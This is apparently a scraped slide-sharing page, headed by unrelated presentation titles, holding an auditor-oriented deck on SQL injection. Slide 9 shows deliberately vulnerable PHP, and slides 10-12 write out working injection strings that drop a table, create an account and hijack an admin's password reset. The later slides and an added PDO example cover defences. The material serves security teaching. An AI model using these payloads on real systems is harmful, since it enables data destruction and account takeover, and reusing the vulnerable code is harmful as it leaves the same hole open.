EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 

Injection techniques conversys

  • 2. What is an Injection Attack? • Exploits weak application level security around the “system” type ID • Exploit allows the client, a.k.a. attacker, to “piggyback” code into a web page, and have the “system” ID execute it for them • Can both execute commands and insert / update / delete data Conversys Technologies PVT. Ltd.
  • 3. What is the Danger? • Typically “system” IDs have “all access” rights to the database • When exploited, the attacker can do anything the “system” ID can • Utilizes no special equipment or advanced knowledge Conversys Technologies PVT. Ltd.
  • 4. Industry Joint study by the US department of Commerce and Visa Ranked as one of the top 5 greatest data security vulnerabilities “SQL injection is a technique used to exploit Web-based applications by using client-supplied data in SQL queries. SQL injection attacks are caused primarily by applications that lack input validation checks. Recently, commercial shopping cart products have been the focus of attack by hackers who seek account information. PCI DSS Requirement 6.5 requires that Web-facing applications be developed in accordance with secure coding guidelines to guard against such attacks. “ Conversys Technologies PVT. Ltd.
  • 5. Different Types of Code Injection • SQL Injection (Most prevalent) • LDAP Injection • XML Injection • Others...... * Flaw is not code specific, rather in the web application it is embedded in Conversys Technologies PVT. Ltd.
  • 6. Structure of Web Based Systems • Application logic– Typically built with a scripting language (php, jsp, asp), a lightweight tool that interfaces with the data source and controls the behavior of the program • Data Source – Typically a database, but could also be a flat file, XML file, or another application • The interface between the application and data source is typically done with an embedded language. Embedded systems integrate one type of code into another (such as a php script executing SQL commands) Conversys Technologies PVT. Ltd.
  • 7. How does it work? Review on Client-Server Architecture You (client) request a web page Server responds with the page, as displayed on the client computer Client enters data Server takes data, runs server side script, queries database, returns results Conversys Technologies PVT. Ltd.
  • 8. What really happens when you search? Server has a prewritten SQL query stored in a script select item, picture, from ItemDB where description = ‘$client_input’; You input “american psycho 1st” Prewritten script is then executed by “system” as : select item, picture, from ItemDB where description = “american psycho 1st”; Please Note: You just used the “system” ID to execute a query that YOU wrote. In practice, most “system” ID’s have DBA level access, and are only restricted by the logic built into the application itself. Conversys Technologies PVT. Ltd.
  • 9. Code Example <?PHP session_start(); header("Cache-control: private"); // IE 6 Fix. error_reporting(E_ALL); ?> <html> <body bgcolor = white> <?php $email = $_SESSION['email']; // Variable holding user’s email address $value = stripslashes($_POST['newdata']); // Variable holding data entered $fieldname = $_POST['type']; // Variable holding fieldname to update if ($_SESSION['access_rights'] == 1) { $db = mysql_connect("localhost", "system_id", “password"); // Connects to local DB mysql_select_db("payroll",$db); // selects database to query $query = "update data SET $fieldname='$value' WHERE email = '$email'"; // Prewritten Query $result = mysql_query($query,$db); // executes query echo "<META HTTP-EQUIV='Refresh' CONTENT='0; URL=return.php'>"; } ?> Conversys Technologies PVT. Ltd.
• 10. How can we exploit this?
  SQL Query Stored in Application:
    select item, picture from ItemDB where description = '$client_input'
  To commit a SQL Injection Attack, enter into the web site form:
    x';drop table 'ItemDB
  The query executed by the "System" ID will now be:
    select item, picture from ItemDB where description = 'x';drop table 'ItemDB'
  The server just executed the stored query, and we just effectively destroyed the entire "ItemDB" table!
• 11. Even More Fun...
  "Add A New User" Canned Query:
    SELECT email, passwd, login_id, full_name FROM members WHERE email = '$user_input';
  SQL Attack:
    x'; INSERT INTO members ('email', 'passwd', 'login_id', 'full_name') VALUES ('mike@pinch.com','mynewPW','pinch','Mike Pinch')
  System then Executes:
    SELECT email, passwd, login_id, full_name FROM members WHERE email = 'x'; INSERT INTO members ('email', 'passwd', 'login_id', 'full_name') VALUES ('mike@pinch.com','mynewPW','pinch','Mike Pinch');
  I now have my very own account!
• 12. One More for Good Measure
  "Forgot my Password" Canned Query:
    SELECT email, passwd, login_id, full_name FROM members WHERE email = '$UserInput';
  SQL Attack:
    x'; UPDATE members SET email = 'pinch@CLIENTX.com' WHERE email = 'sysadmin@CLIENTX.com
  System then Executes:
    SELECT email, passwd, login_id, full_name FROM members WHERE email = 'x'; UPDATE members SET email = 'pinch@CLIENTX.com' WHERE email = 'sysadmin@CLIENTX.com';
  Now just go to forgot my password, type pinch@CLIENTX.com, and the system will conveniently email me the system admin's password!
• 14. Error Message Masking (screenshots: a "Bad" and a "Good" error message example)
• 15. Error Masking
  • Blocks real error messages from being displayed to the client
  • Best Practice: All specific error messages are suppressed, either through using a generic error message, or blocking them altogether.
• 16. How are Attacks Prevented?
  • Sanitize all input, including:
    – Data collected in Forms through browsers
    – Data collected in URLs
    – Data collected through cookies
  • White/Black List
  • Mask Error Messages
  • Continuous Monitoring
  • New Technique: SQL Firewalls
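As an added example (not from the slides or from Conversys), here is the slide 9 update rewritten so that client input can no longer change the SQL text: the column name is checked against a whitelist because identifiers cannot be bound, the value and email go through bound parameters, and errors are masked as slide 15 recommends. Using PDO instead of the mysql_* functions, the connection details and the whitelist contents are assumptions.

```php
<?php
// Added example, not from the original slides. Hardened version of the slide 9 update.
// Assumes PDO with MySQL; the column whitelist below is assumed.
declare(strict_types=1);
session_start();

// Identifiers cannot be bound as parameters, so the column to update is matched
// against a fixed list instead of being copied from $_POST['type'] into the SQL.
const UPDATABLE_FIELDS = ['full_name', 'phone', 'address'];   // assumed column set

function buildUpdate(string $fieldname): string
{
    if (!in_array($fieldname, UPDATABLE_FIELDS, true)) {
        throw new InvalidArgumentException('field not updatable');
    }
    // Only a whitelisted identifier reaches the SQL text; the values are placeholders.
    return "UPDATE data SET `$fieldname` = :value WHERE email = :email";
}

function updateField(PDO $db, string $email, string $fieldname, string $value): int
{
    $stmt = $db->prepare(buildUpdate($fieldname));
    // Bound values travel separately from the SQL text, so input containing ' or ;
    // is stored literally and is never parsed as a second statement.
    $stmt->execute([':value' => $value, ':email' => $email]);
    return $stmt->rowCount();
}

if (($_SESSION['access_rights'] ?? 0) != 1) {
    http_response_code(403);
    exit;
}

try {
    // The "system_id" account should hold only UPDATE on payroll.data, not the DBA
    // level access slide 8 says most "system" IDs have.
    $db = new PDO('mysql:host=localhost;dbname=payroll;charset=utf8mb4', 'system_id', 'password', [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,   // server-side prepared statements
    ]);
    $email = (string) ($_SESSION['email'] ?? '');
    updateField($db, $email, (string) ($_POST['type'] ?? ''), (string) ($_POST['newdata'] ?? ''));
    header('Location: return.php');
} catch (Throwable $e) {
    error_log($e->getMessage());   // detail stays in the server log (slide 15)
    http_response_code(500);
    echo 'An error occurred.';     // generic message for the client
}
```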
• 17. Prevalence of Attacks
  • Injection attacks are extremely powerful, almost always malicious, and nearly undetectable (until it's too late)
  • Danger comes from simplicity – no special hardware or software is necessary. Just syntax knowledge and a browser!
  • In 2006, 14% of newly released commercial applications and open source tools were vulnerable to SQL injection attacks.
  • A recent study of web sites not masking error messages returned a total of 10.3%
• 18. Integrating into the Audit
  • Weak controls related to preventing injection attacks may affect the nature, timing and extent of financial statement substantive audit procedures.
  • Assistance may be needed from systems or data management professionals to help identify if there were instances in which the control weaknesses were exploited.
  • Cobit Framework – DS 5.3, Identity Management (see excerpt):
    "All users (internal, external and temporary) and their activity on IT systems (business application, system operation, development and maintenance) should be uniquely identifiable. User access rights to systems and data should be in line with defined and documented business needs and job requirements. User access rights are requested by user management, approved by system owner and implemented by the security-responsible person. User identities and access rights are maintained in a central repository. Cost-effective technical and procedural measures are deployed and kept current to establish user identification, implement authentication and enforce access rights."
• 19. What Systems are Vulnerable?
  • Predominantly internally developed applications
  • Web based client-server architecture
  • Any system where access is available via the web
• 20. How do you determine if a system is vulnerable?
  • Inquire
    – Do you have database and server error messages masked?
    – Do you have a strategy to sanitize all user input to detect SQL injection attacks?
    – Walk me through how your system prevents SQL injection attempts, i.e. filtering input, limiting rights.
  • Observe
    – Ask client to generate an error message
      • Should either be generic or non-existent
  • Inspect
    – Request code sample showing filtering module logic
      • Should filter out suspicious characters such as ' , / ; & % $ etc.
    – View White/Black List
  • Attack and Penetration Testing
• 21. Created and Presented by Krishnendu Paul, Vice President – Technologies, Conversys Technologies Pvt. Ltd., A Maxelor Company
  References
  • http://www.sarbanes-oxley.com/section.php?level=1&pub_id=Sarbanes-Oxley
  • http://usa.visa.com/download/business/accepting_visa/ops_risk_management/Top_5_Vulnerabilities_Bulletin_August2006.pdf - 2006 Visa USA
  • "Applying an improved economic model to software buy-versus-build decisions", Higaki, Wesley. Hewlett-Packard Journal, August 1995.
  • "Cobit 4.0", IT Governance Institute, 2005
  • Mitre Corporation, 2006
• 22. Thanks
  Conversys Technologies Pvt. Ltd.
  • Kolkata Office: 7, Bondel Road, Kolkata, West Bengal, India – 700019. E-mail: info@conversys.in. Telephone: +91-33-64602675
  • Pune Office: #204, Casa Grande, Lane No. 8, Koregaon Park, Pune - 411 001. Telephone: +91 20 26052014
  • US Office: 15 Corporate Place, Suite# 333, Piscataway, NJ, 08854 USA